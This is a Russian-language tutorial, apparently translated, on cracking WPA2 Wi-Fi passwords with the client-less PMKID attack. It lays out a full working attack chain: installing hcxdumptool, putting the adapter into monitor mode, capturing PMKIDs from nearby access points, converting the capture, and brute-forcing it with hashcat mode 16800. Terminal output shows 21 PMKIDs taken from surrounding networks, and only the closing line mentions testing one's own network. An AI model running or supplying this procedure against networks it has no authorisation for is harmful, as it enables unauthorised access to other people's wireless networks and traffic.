Взлом Wi-Fi: новый метод перехвата паролей WPA2 с помощью Hashcat
Форсайт
Взлом паролей с безопасностью WPA2 оставался однообразным очень много времени. Но новому методу требуется меньше информации и это позволяет нацеливаться на точки доступа без подключения к ним. Эта атака использует Hashcat для взлома WPA паролей и позволяет хакерам находить сети с уязвимыми паролями гораздо быстрее.
Новый метод взлома
Вместо того, чтобы полагаться на перехват двусторонней связи между устройствами Wi-Fi для попытки взлома пароля, можно напрямую связаться с уязвимой точкой доступа, используя новый метод. В сообщении на форуме Hashcat подробно рассказывалось о новом методе, использующем атаку против надежного информационного элемента сети безопасности одного кадра EAPOL для сбора необходимой информации для попытки атаки методом перебора.
Подобно предыдущим атакам на WPA, злоумышленник должен находиться в непосредственной близости от сети, которую он хочет атаковать. Цель будет заключаться в использовании Kali-совместимого беспроводного сетевого адаптера для сбора информации, необходимой из сети, для попытки перебора пароля. Вместо того, чтобы использовать Aireplay-ng или Aircrack-ng, мы будем использовать новый инструмент для беспроводной атаки, который называется hcxtools.
Использование Hcxtools и Hashcat
Hcxdumptool и hcxpcaptool - это инструменты, написанные для аудита Wi-Fi и тестирования на проникновение.
Они позволяют нам взаимодействовать с сетями Wi-Fi для захвата рукопожатий WPA и хешей PMKID.
После захвата PMKID следующим шагом является загрузка хеша в Hashcat и попытка взломать пароль. В этом отличие hcxtools от Besside-ng в том, что для подготовки файла для использования Hashcat необходим шаг преобразования. Мы будем использовать hcxpcaptool для преобразования нашего файла PCAPNG в один Hashcat, с которым можно работать, оставляя только шаг выбора надежного списка паролей для ваших попыток перебора.
Стоит отметить, что не каждая сеть уязвима для этой атаки. Поскольку это необязательное поле, добавляемое некоторыми производителями, вы не должны ожидать универсального успеха с этой техникой. Возможность захвата PMKID зависит от того, сделал ли вам производитель точки доступа пользу от включения элемента, который включает его, и от того, сможете ли вы взломать захваченный PMKID, зависит от того, содержится ли базовый пароль в вашем переборе. список паролей. Если какое-либо условие не будет выполнено, эта атака потерпит неудачу.
Что вам понадобится
Чтобы попробовать эту атаку, вам нужно будет запустить Kali Linux и иметь доступ к адаптеру беспроводной сети, который поддерживает режим мониторинга и внедрение пакетов. У нас есть несколько советов по выбору совместимого адаптера беспроводной сети ниже.
Помимо Kali-совместимого сетевого адаптера, убедитесь, что вы полностью обновили и обновили свою систему. Если вы этого не сделаете, некоторые пакеты могут быть устаревшими и вызывать проблемы при захвате.
Установка Hcxtools и Hashcat
Сначала мы установим нужные нам инструменты. Для загрузки введите следующее в окне терминала.
git clone https://github.com/ZerBea/hcxdumptool.git cd hcxdumptool make make install
Когда установка закончится, мы перейдем к установке hxctools. Для этого откройте окно терминала и вставьте следующую строку. Если вы получили ошибку, попробуйте ввести sudo перед командой.
Наконец, нам нужно установить Hashcat. Это должно быть легко, так как он включен в репозиторий Kali Linux по умолчанию. Просто введите следующее:
apt install hashcat
После этого мы можем перейти к настройке адаптера беспроводной сети.
Подготовка адаптера
После подключения вашего Kali-совместимого сетевого адаптера, вы можете найти имя, набрав ifconfig или ip a.
Как правило, он будет назван как-то как wlan0.
Первым шагом будет перевод карты в режим беспроводного монитора, что позволит нам прослушивать трафик Wi-Fi в непосредственной близости. Для этого введите в окне терминала следующую команду, подставив вместо имени беспроводного сетевого адаптера имя wlan0.
airmon-ng start wlan0
Found 3 processes that could cause trouble
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
PID Name
555 NetworkManager
611 wpa_supplicant
6636 dhclient
PHY Interface Driver Chipset
phy0 wlan0 ath9k Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
phy1 wlan1 ath9k_htc Atheros Communications, Inc. AR9271 802.11n
Теперь у вашего адаптера должно быть имя типа «wlan0mon», и он должен находиться в режиме мониторинга. Вы можете подтвердить это, запустив ifconfig снова.
Использование Hxcdump для захвата PMKIDs из локальных сетей
Теперь мы готовы захватить PMKID устройств, которые мы хотим атаковать. С нашим беспроводным сетевым адаптером в режиме мониторинга под названием «wlan1mon» мы введем следующую команду, чтобы начать атаку.
hcxdumptool -i wlan1mon -o galleria.pcapng --enable__status=1
-i сообщает программе, какой интерфейс мы используем.
В данном случае, wlan1mon.
Имя файла, в который мы будем сохранять результаты, можно указать с помощью аргумента -o flag. Канал, по которому мы хотим сканировать, может быть обозначен флагом -c, за которым следует номер канала для сканирования. В нашей команде выше мы используем wlan1mon для сохранения захваченных PMKID в файл с именем "galleria.pcapng".
Несмотря на то, что вы можете указать другое значение статуса, я не смог захватить ни одно значение, кроме 1.
warning: NetworkManager is running with pid 555 warning: wpa_supplicant is running with pid 611 warning: wlan1mon is probably a monitor interface start capturing (stop with ctrl+c) INTERFACE:...............: wlan1mon FILTERLIST...............: 0 entries MAC CLIENT...............: fcc233ca8bc5 MAC ACCESS POINT.........: 10ae604b9e82 (incremented on every new client) EAPOL TIMEOUT............: 150000 REPLAYCOUNT..............: 62439 ANONCE...................: d8dd2206c82ad030e843a39e8f99281e215492dbef56f693cd882d4dfcde9956 [22:17:32 - 001] c8b5adb615ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:32 - 001] c8b5adb615e9 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:33 - 001] 2c95694f3ca0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:33 - 001] 2c95694f3ca0 -> b4b686abc81a [FOUND PMKID] [22:17:48 - 011] 14edbb9938ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:48 - 011] 88964e3a8ea0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:49 - 011] dc7fa425888a -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:51 - 011] 88964e801fa0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [EAPOL 4/4 - M4 RETRY ATTACK] [22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 6696] [22:18:04 - 011] 803773defd01 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:19:21 - 011] 14edbb9ba0e6 -> 803773defd01 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 15247] [22:19:34 - 006] 0618d629465b -> 58fb8433aac2 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 2832] [22:19:42 - 005] e0220203294e -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:19:57 - 011] 14edbb9ba0e6 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:20:02 - 008] 14edbbd29326 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:20:04 - 008] 1c872c707c60 -> 78e7d17791e7 [FOUND PMKID] [22:20:11 - 009] e0220453a576 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS] [22:20:27 - 001] ace2d32602da -> c8665d5dd654 [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 5202] INFO: cha=2, rx=32752, rx(dropped)=2801, tx=2205, powned=18, err=0
Когда вы соберете достаточно, вы можете остановить программу, набрав Ctrl-C.
Это должно привести к созданию файла PCAPNG, содержащего информацию, которая нам необходима для попытки атаки, но нам нужно будет преобразовать его в формат, понятный Hashcat.
hcxpcaptool -E essidlist -I identitylist -U usernamelist -z galleriaHC.16800 galleria.pcapng
Эта команда говорит hxcpcaptool использовать информацию, включенную в файл, чтобы помочь Hashcat понять ее с флагами -E, -I и -U. Флаг -Z используется для имени вновь преобразованного файла, который будет использовать Hashcat, а последняя часть команды - это файл PCAPNG, который мы хотим преобразовать.
Выполнение команды должно показать нам следующее.
summary: -------- file name....................: galleria.pcapng file type....................: pcapng 1.0 file hardware information....: x86_64 file os information..........: Linux 4.18.0-kali2-amd64 file application information.: hcxdumptool 4.2.1 network type.................: DLT_IEEE802_11_RADIO (127) endianess....................: little endian read errors..................: flawless packets inside...............: 1089 skipped packets..............: 0 packets with GPS data........: 0 packets with FCS.............: 732 beacons (with ESSID inside)..: 49 probe requests...............: 26 probe responses..............: 40 association requests.........: 103 association responses........: 204 reassociation requests.......: 2 reassocaition responses......: 7 authentications (OPEN SYSTEM): 346 authentications (BROADCOM)...: 114 authentications (APPLE)......: 1 EAPOL packets................: 304 EAPOL PMKIDs.................: 21 best handshakes..............: 4 (ap-less: 1) 21 PMKID(s) written to galleriahC.16800
Здесь мы видим, что за короткий промежуток времени мы собрали 21 PMKID.
Теперь мы можем использовать файл «galleriaHC.16800» в Hashcat, чтобы попытаться взломать сетевые пароли.
Выбор списка паролей и перебор с помощью Hashcat
Чтобы начать атаковать захваченные нами хэши, нам нужно выбрать хороший список паролей.
В коллекции SecList вы можете найти несколько хороших списков паролей. Получив список, поместите его в ту же папку, что и только что преобразованный файл .16800, а затем выполните следующую команду в окне терминала.
hashcat -m 16800 galleriaHC.16800 -a 0 --kernel-accel=1 -w 4 --force 'topwifipass.txt'
В этой команде мы запускаем Hashcat в режиме 16800, который предназначен для атаки на сетевые протоколы WPA-PMKID-PBKDF2.
Далее мы укажем имя файла, который мы хотим взломать, в данном случае «galleriaHC.16800». Флаг -a указывает нам, какие типы атак использовать, в данном случае «прямую» атаку, а затем флаги -w и --kernel-accel = 1 указывают профиль рабочей нагрузки с наивысшей производительностью. Если у вашего компьютера проблемы с производительностью, вы можете уменьшить число в аргументе -w.
Далее, опция --force игнорирует любые предупреждения о продолжении атаки, а последняя часть команды указывает список паролей, который мы используем, чтобы попытаться перебить форсированные PMKID в нашем файле, в данном случае называемом «topwifipass».txt."
hashcat (v4.2.1) starting... OpenCL Platform #1: The pocl project ==================================== * Device #1: pthread-AMD A8-6410 APU with AMD Radeon R5 Graphics, 2553/2553 MB allocatable, 4MCU Hashes: 21 digests; 21 unique digests, 20 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Applicable optimizers: * Zero-Byte * Slow-Hash-SIMD-LOOP Minimum password length supported by kernel: 8 Maximum password length supported by kernel: 63 Watchdog: Hardware monitoring interface not found on your system. Watchdog: Temperature abort trigger disabled. * Device #1: build_opts '-cl-std=CL1.1 -I OpenCL -I /usr/share/hashcat/OpenCL -D VENDOR ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=16800 -D _unroll' Dictionary cache hit: * Filename..: topwifipass.txt * Passwords.: 4801 * Bytes.....: 45277 * Keyspace..: 4801 [s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>
В зависимости от скорости вашего оборудования и размера списка паролей, это может занять некоторое время. Чтобы увидеть статус в любое время, вы можете нажать клавишу S для обновления.
Результат
Когда Hashcat крашнется, вы сможете проверить прогресс, чтобы увидеть, были ли восстановлены какие-либо ключи.
Hash.Type........: WPA-PMKID-PBKDF2 Hash.Target......: galleriaHC.16800 Time.Started.....: Sun Oct 28 22:32:57 2018 (7 mins, 50 secs) Time.Estimated...: Sun Oct 28 22:57:50 2018 (17 mins, 3 secs) Guess.Base.......: File (topwifipass.txt) Guess.Queue......: 1/1 (100.00%) Speed.Dev.#1.....: 64 H/s (15.43ms) @ Accel:1 Loops:1024 Thr:1 Vec:4 Recovered........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts Progress.........: 30180/96020 (31.43%) Rejected.........: 0/30180 (0.00%) Restore.Point....: 1508/4801 (31.41%) Candidates.#1....: peter123 -> moneyman HWon.Dev.#1......: N/A [s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => Session..........: hashcat Status...........: Running Hash.Type........: WPA-PMKID-PBKDF2 Hash.Target......: galleriaHC.16800 Time.Started.....: Sun Oct 28 22:32:57 2018 (19 mins, 56 secs) Time.Estimated...: Sun Oct 28 22:57:54 2018 (5 mins, 3 secs) Guess.Base.......: File (topwifipass.txt) Guess.Queue......: 1/1 (100.00%) Speed.Dev.#1.....: 64 H/s (15.24ms) @ Accel:1 Loops:1024 Thr:1 Vec:4 Recovered........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts Progress.........: 76736/96020 (79.92%) Rejected.........: 0/76736 (0.00%) Restore.Point....: 3836/4801 (79.90%) Candidates.#1....: monopoli -> mercenary HWon.Dev.#1......: N/A [s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>
Когда список паролей приближается к концу, Hashcat автоматически отрегулирует рабочую нагрузку и предоставит вам окончательный отчет, когда он будет завершен.
Approaching final keyspace - workload adjusted. Session..........: hashcat Status...........: Exhausted Hash.Type........: WPA-PMKID-PBKDF2 Hash.Target......: hotspotcap.16800 Time.Started.....: Sun Oct 28 18:05:57 2018 (3 mins, 49 secs) Time.Estimated...: Sun Oct 28 18:09:46 2018 (0 secs) Guess.Base.......: File (topwifipass.txt) Guess.Queue......: 1/1 (100.00%) Speed.Dev.#1.....: 42 H/s (15.56ms) @ Accel:1 Loops:1024 Thr:1 Vec:4 Recovered........: 0/2 (0.00%) Digests, 0/2 (0.00%) Salts Progress.........: 9602/9602 (100.0%) Rejected.........: 2/9602 (0.02%) Restore.Point....: 4801/4801 (100.0%) Candidates.#1....: 159159159 -> 00001111 HWon.Dev.#1......: N/A Started: Sun Oct 28 18:05:56 2018 Stopped: Sun Oct 28 18:09:49 2018
Если вам удалось взломать какие-либо пароли, вы увидите их здесь.
Атака PMKID Hashcat облегчает атаки Wi-Fi
Если ваша сеть даже не поддерживает надежный элемент безопасности, содержащий PMKID, у этой атаки нет шансов на успех. Вы можете проверить свою собственную сеть с помощью hcxtools, чтобы увидеть, подвержена ли она этой атаке.